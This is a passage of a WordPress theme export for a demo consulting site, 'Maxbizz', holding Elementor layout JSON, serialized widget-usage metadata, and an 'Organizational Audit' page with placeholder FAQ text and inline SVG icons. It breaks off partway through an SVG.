improvements.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"94af6c9","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"4e4cb68","elType":"widget","settings":{"title":"Services","header_size":"h5","typography_font_family":"Roboto","typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"1ebc8a8","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"3d2f32e","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"83881c6","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"fcdefbb","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"82d1d05","elType":"widget","settings":{"text":"Divider","color":"#55BB53","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"2301f15","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#55BB53","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#55BB53","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"86a5b1b","elType":"widget","settings":{"title":"Contacts","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"cb92309","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"5","left":"0","isLinked":false}},"elements":[{"id":"2b9345c","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"798f2b3","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"46c4dc2","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"a5a16d3","elType":"widget","settings":{"text":"Divider","color":"#55BB53","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"e084289","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#55BB53","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"bold","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Raleway","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"b3e48c6","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#55BB53","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"bold","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Raleway","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"492df2b","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#55BB53","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"bold","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Raleway","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"d978f37","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf-home4.jpg","id":2076},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"47b73dc","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"background_background":"classic","padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"2b560d9","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4ea2964","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","background_background":"classic","background_color":"#55BB53","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"1b310af","elType":"column","settings":{"_column_size":50,"_inline_size":18,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"d071b90","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04_Full_White.svg","id":1956},"image_size":"full","align":"left","width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"7681957","elType":"column","settings":{"_column_size":50,"_inline_size":82,"_inline_size_tablet":100},"elements":[{"id":"f2b8c4a","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:5:"image";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:4;s:10:"image_size";i:4;s:5:"align";i:2;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:2:{s:19:"image_border_radius";i:2;s:5:"width";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:5;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:5;s:11:"header_size";i:5;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:4:{s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;s:22:"typography_font_weight";i:2;s:22:"typography_font_family";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:8:"advanced";a:2:{s:14:"_section_style";a:4:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;s:7:"_margin";i:2;s:12:"_css_classes";i:1;}s:15:"_section_border";a:3:{s:14:"_border_border";i:1;s:13:"_border_width";i:1;s:13:"_border_color";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:1;s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:3;s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:3;}}}}s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:3:"gap";i:7;s:6:"layout";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:6;s:14:"padding_mobile";i:4;s:6:"margin";i:3;s:13:"margin_mobile";i:3;s:14:"padding_tablet";i:2;s:13:"margin_tablet";i:2;s:7:"z_index";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:4;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_radius";i:3;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:8:{s:11:"text_indent";i:2;s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:5:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;s:17:"icon_space_mobile";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[select_footer]]></wp:meta_key>
		<wp:meta_value><![CDATA[300]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Organizational Audit</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services/organizational-audit/</link>
		<pubDate>Thu, 17 Sep 2020 04:03:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=959</guid>
		<description></description>
		<content:encoded><![CDATA[<h6>how we help</h6>		
			<h1>Align Costs with Strategy & Focus on Growth</h1>		
			<a href="#">get in touch</a>
	        main principles	        <h3>Global Reach with Local  Understanding</h3>	    
				In what areas do you provide management consulting? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.</p>				
				In which countries do you provide consulting services? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.</p>				
				How is a consulting project started and organized? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.</p>				
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-4-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
	        our benefits	        <h3>Why Clients Choose Us</h3>	    
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Consulting</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled </p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M473.492,189.736h-0.001l-22.417-2.651c-2.44-6.903-5.255-13.693-8.412-20.293l13.979-17.731    c13.686-17.358,13.649-40.806-0.084-54.541l-39.083-39.083c-13.734-13.734-37.182-13.771-54.543-0.083l-17.73,13.981    c-6.603-3.159-13.393-5.974-20.294-8.412l-2.651-22.417C319.659,16.554,303.054,0,283.63,0h-55.271    c-19.424,0-36.03,16.555-38.626,38.51l-2.65,22.417c-6.899,2.439-13.684,5.251-20.284,8.408l-17.73-13.981    c-17.359-13.687-40.807-13.653-54.543,0.083L55.444,94.519c-13.734,13.735-13.771,37.183-0.084,54.541l13.979,17.73    c-3.159,6.602-5.974,13.392-8.413,20.293l-22.418,2.651C16.555,192.33,0,208.935,0,228.359v55.271    c0,19.423,16.554,36.029,38.506,38.624l22.417,2.652c2.438,6.902,5.253,13.692,8.411,20.294l-13.981,17.731    c-13.688,17.359-13.652,40.807,0.083,54.542l39.082,39.083c13.733,13.733,37.182,13.771,54.541,0.084l17.73-13.979    c6.603,3.159,13.393,5.974,20.294,8.413l2.65,22.417C192.329,495.445,208.934,512,228.359,512h55.271    c19.424,0,36.029-16.554,38.626-38.507l2.651-22.416c6.906-2.44,13.698-5.255,20.304-8.416l17.73,13.98    c17.359,13.684,40.807,13.65,54.541-0.085l39.082-39.082c13.734-13.734,13.771-37.182,0.083-54.542l-13.981-17.731    c3.158-6.602,5.973-13.392,8.411-20.294l22.416-2.652C495.445,319.658,512,303.053,512,283.63v-55.271    C512,208.935,495.445,192.33,473.492,189.736z M492,283.63c0,9.291-8.966,17.357-20.854,18.763l-28.704,3.396    c-3.897,0.461-7.165,3.16-8.354,6.9c-3.183,10.008-7.246,19.808-12.073,29.128c-1.807,3.487-1.406,7.709,1.026,10.792    l17.904,22.706c7.413,9.403,8.049,21.448,1.479,28.017l-39.082,39.083c-6.57,6.569-18.614,5.934-28.016-1.479l-22.706-17.903    c-3.083-2.431-7.303-2.833-10.792-1.026c-9.325,4.831-19.128,8.895-29.136,12.078c-3.74,1.189-6.439,4.457-6.9,8.355    l-3.396,28.705c-1.407,11.89-9.474,20.856-18.765,20.856H228.36c-9.292,0-17.359-8.967-18.765-20.857l-3.394-28.706    c-0.461-3.897-3.159-7.166-6.899-8.355c-10.006-3.183-19.806-7.246-29.129-12.076c-1.451-0.752-3.029-1.121-4.598-1.121    c-2.204,0-4.392,0.727-6.193,2.149l-22.706,17.902c-9.403,7.414-21.448,8.047-28.016,1.479l-39.082-39.083    c-6.571-6.57-5.935-18.614,1.479-28.016l17.904-22.707c2.431-3.084,2.833-7.306,1.026-10.792    c-4.827-9.319-8.889-19.12-12.073-29.128c-1.189-3.74-4.457-6.439-8.354-6.9l-28.705-3.396C28.966,300.987,20,292.921,20,283.63    v-55.271c0-9.291,8.967-17.358,20.857-18.764l28.706-3.394c3.898-0.461,7.166-3.159,8.355-6.899    c3.183-10.006,7.246-19.807,12.075-29.129c1.807-3.486,1.406-7.708-1.026-10.791l-17.902-22.706    c-7.414-9.402-8.049-21.446-1.479-28.016l39.081-39.083c6.569-6.57,18.615-5.935,28.017,1.48l22.706,17.904    c3.083,2.431,7.304,2.834,10.791,1.027c9.318-4.827,19.115-8.888,29.12-12.071c3.74-1.189,6.438-4.457,6.899-8.355l3.394-28.705    C211.001,28.967,219.067,20,228.359,20h55.271c9.291,0,17.358,8.966,18.764,20.855l3.396,28.705c0.461,3.898,3.16,7.166,6.9,8.355    c10.005,3.181,19.806,7.244,29.128,12.073c3.484,1.807,7.708,1.406,10.792-1.026l22.706-17.904    c9.404-7.412,21.448-8.051,28.017-1.48l39.083,39.082c6.569,6.57,5.933,18.614-1.479,28.016l-17.903,22.707    c-2.431,3.084-2.833,7.305-1.026,10.792c4.827,9.315,8.889,19.115,12.075,29.127c1.189,3.74,4.457,6.439,8.355,6.899l28.706,3.394    h-0.001c11.89,1.406,20.857,9.473,20.857,18.764V283.63z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M255.999,94.28c-89.173,0-161.721,72.548-161.721,161.721c0,35.631,11.362,69.426,32.86,97.729    c20.797,27.382,50.325,47.78,83.142,57.435c5.301,1.56,10.856-1.473,12.416-6.771c1.559-5.298-1.472-10.857-6.771-12.416    C156.078,374.37,114.279,318.454,114.279,256c0-78.145,63.575-141.721,141.721-141.721S397.721,177.855,397.721,256    c0,64.606-43.619,121.026-106.076,137.203c-5.346,1.385-8.558,6.842-7.173,12.188c1.167,4.506,5.226,7.495,9.674,7.495    c0.831,0,1.674-0.104,2.515-0.322C367.94,394.102,417.721,329.72,417.721,256C417.721,166.827,345.172,94.28,255.999,94.28z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M334.324,302.94L266,251.038v-44.663c0-5.523-4.478-10-10-10c-5.522,0-10,4.477-10,10V256    c0,3.126,1.462,6.072,3.952,7.962l72.275,54.903c1.809,1.374,3.933,2.038,6.041,2.038c3.019,0,6.003-1.361,7.97-3.951    C339.579,312.554,338.722,306.281,334.324,302.94z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="256" cy="164.02" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="252.36" cy="407.72" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Planning</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled </p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
